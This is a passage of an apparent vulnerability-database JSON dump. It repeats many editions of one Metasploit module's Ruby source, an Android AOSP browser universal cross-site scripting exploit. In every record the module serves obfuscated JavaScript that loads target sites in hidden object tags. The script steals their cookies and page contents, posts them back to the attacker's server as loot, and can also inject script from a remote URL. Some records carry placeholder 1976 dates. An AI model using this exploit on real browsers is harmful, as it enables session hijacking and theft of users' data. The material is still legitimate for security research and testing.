Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-19T23:46:10", "differentElements": ["modified", "published"], "edition": 17}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-22T21:42:33", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-22T21:42:33"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-22T21:42:33", "differentElements": ["modified", "published"], "edition": 18}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-23T07:45:02", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-23T07:45:02"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-23T07:45:02", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-25T11:46:34", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-25T11:46:34"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-25T11:46:34", "differentElements": ["modified", "published"], "edition": 20}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-25T13:48:07", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-25T13:48:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-25T13:48:07", "differentElements": ["modified", "published"], "edition": 21}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-28T09:52:29", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-28T09:52:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', 